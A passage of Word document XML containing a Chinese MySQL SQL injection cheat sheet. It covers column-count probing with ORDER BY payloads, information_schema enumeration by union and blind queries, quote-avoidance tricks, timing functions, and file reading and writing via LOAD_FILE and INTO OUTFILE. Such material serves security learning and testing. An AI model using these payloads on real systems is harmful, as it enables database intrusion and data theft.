            <w:tcW w:w="2040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1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>ORDER BY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 xml:space="preserve">2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3578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4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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1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 ORDER BY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 xml:space="preserve">3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3578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FALSE（列数为2）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(Unknown column '3' in 'order clause')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4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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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 w:ascii="Courier New" w:hAnsi="Courier New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’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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urier New" w:hAnsi="Courier New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ORDER BY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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 xml:space="preserve">1,2,3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3578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FALSE（列数为2）</w:t>
            </w:r>
          </w:p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(Unknown column '3' in 'order clause')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8522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AND (SELECT * FROM 表) = 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040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1' 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AND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(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* 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FROM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job) = 1 #</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="357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FALSE（列数为2）</w:t>
            </w:r>
          </w:p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(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 xml:space="preserve">Operand should contain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2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 xml:space="preserve"> column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s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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检索表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4"/>
        <w:gridCol w:w="5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库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5498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information_schema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表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5498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列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5498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table_name, table_schema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SQL：查询当前数据库的所有表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5498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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">table_name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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">information_schema.tables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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table_schema = database();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New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7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方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7283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Union</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7283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UNION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column_name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FROM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information_schema.columns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WHERE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table_name =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‘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表名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Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7283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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">AND SELECT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LENGTH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 xml:space="preserve">(table_name) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM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 xml:space="preserve">information_schema.tables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= 表名长度;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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">AND SELECT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 xml:space="preserve">SUBSTR(table_name,1,1) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM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information_schema.tables &gt; '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字符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'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;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6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">检索列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2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库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576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information_schema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表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576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columns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列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576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column_name, table_name, table_schema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SQL：查询</w:t>
            </w:r>
          </w:p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某个库的某张表的所有列</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576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column_name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FROM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information_schema.`columns`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WHERE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table_schema = 'hrm' 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AND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table_name = 'user';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7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方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7726" w:type="dxa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Union</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="772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UNION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eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">column_name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FROM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">information_schema.columns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WHERE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table_name = '表名'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Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7726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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">AND SELECT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LENGTH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 xml:space="preserve">(column_name) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM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information_schema.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columns = 表名长度;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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">AND SELECT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 xml:space="preserve">SUBSTR(column_name,1,1) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM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information_schema.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columns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&gt; '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字符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'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;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6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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从列名中查找表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7"/>
        <w:gridCol w:w="4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SQL：查找包含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>某列名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的所有表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4985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table_name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FROM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information_schema.columns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WHERE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column_name ='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>列名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';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6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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从表名中查找列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7"/>
        <w:gridCol w:w="4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SQL：查找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>某张表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的所有列</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4985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eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">column_name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FROM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">information_schema.columns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WHERE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table_name ='</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>表名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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找出当前的查询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5"/>
        <w:gridCol w:w="4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SQL：找出当前的查询</w:t>
            </w:r>
          </w:p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（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts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从MySQL 5.1.7开始提供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）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4987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info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FROM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information_schema.processlist;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59" w:name="_Toc9032_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>避免使用引用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p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如果SQL使用到的字段跟关键字重复，我们需要避免这些引用。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5"/>
        <w:gridCol w:w="6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十六进制编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517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* 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FROM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Users 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WHERE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username = 0x61646D696E;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CHAR() 函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517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* 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FROM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Users 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WHERE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username = CHAR(97, 100, 109, 105, 110);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用反引号：`字段`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517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* 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FROM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`Order` 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WHERE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id = 1;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60" w:name="_Toc29941_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符串连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p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连接字符串：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="79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2"/>
        <w:gridCol w:w="4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2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CONCAT(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‘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a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d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m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i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n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 )</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4723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注意：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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CONCAT_WS() 第一个参数是分割符。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left"/>
              <w:outlineLvl w:val="9"/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CONCAT() 如果有任何参数是NULL，都返回NULL。CONCAT_WS() 会忽略NULL。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2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CONCAT_WS(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‘’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‘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a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d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m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i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n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 )</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4723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2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GROUP_CONCAT(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‘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a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d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m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i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n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 )</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4723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61" w:name="_Toc32078_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>条件语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8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7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语句</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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CASE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717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SELECT CASE WHEN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>条件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THEN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>真值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 ELSE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>假值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>END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IF()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717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>SELECT IF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( </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>条件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ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>真值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ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">假值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IFNULL()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717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>SELECT IFNULL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( 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>值1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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 xml:space="preserve"> 值2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 )  （如果值1为NULL，返回值2，否则返回值1）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NULLIF()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="717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>SELECT NULLIF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( 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>值1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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 xml:space="preserve"> 值2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 )  （如果值1 = 值2，返回NULL，否则返回值1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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62" w:name="_Toc12306_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定时</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="30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语句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SLEEP()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MySQL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BENCHMARK()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365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MySQL 4/5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63" w:name="_Toc10377_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/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文件权限（以下查询可帮助确定给定用户的FILE权限）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0"/>
        <w:gridCol w:w="1635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SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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需要root权限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b/>
                <w:bCs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 xml:space="preserve">file_priv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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM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 xml:space="preserve">mysql.user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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE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user ='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>用户名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';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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需要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MySQL 4/5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b/>
                <w:bCs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 xml:space="preserve">grantee, is_grantable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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM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 xml:space="preserve">information_schema.user_privileges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b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE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privilege_type = 'file' AND grantee like '%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>用户名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%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="163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不需要</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="126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MySQL 5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64" w:name="_Toc28750_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>读文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/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如果用户具有FILE权限，则可以读取文件。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="83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0"/>
        <w:gridCol w:w="6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LOAD_FILE('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>文件路径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')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6037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注意：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>文件必须位于服务器主机上。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>LOAD_FILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">() </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">的基本目录是 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>@@</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>datadir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>该文件必须是MySQL用户可读的。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>文件大小必须小于max_allowed_packet。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>默认大小为 @@max_allowed_packet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> ：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1047552字节</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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65" w:name="_Toc6963_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/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如果用户具有FILE权限，则可以创建文件。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="8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0"/>
        <w:gridCol w:w="5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8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INTO OUTFILE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‘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>文件路径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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5662" w:type="dxa"/>
            <w:vMerge w:val="restart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注意：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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文件无法覆盖 INTO OUTFILE。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
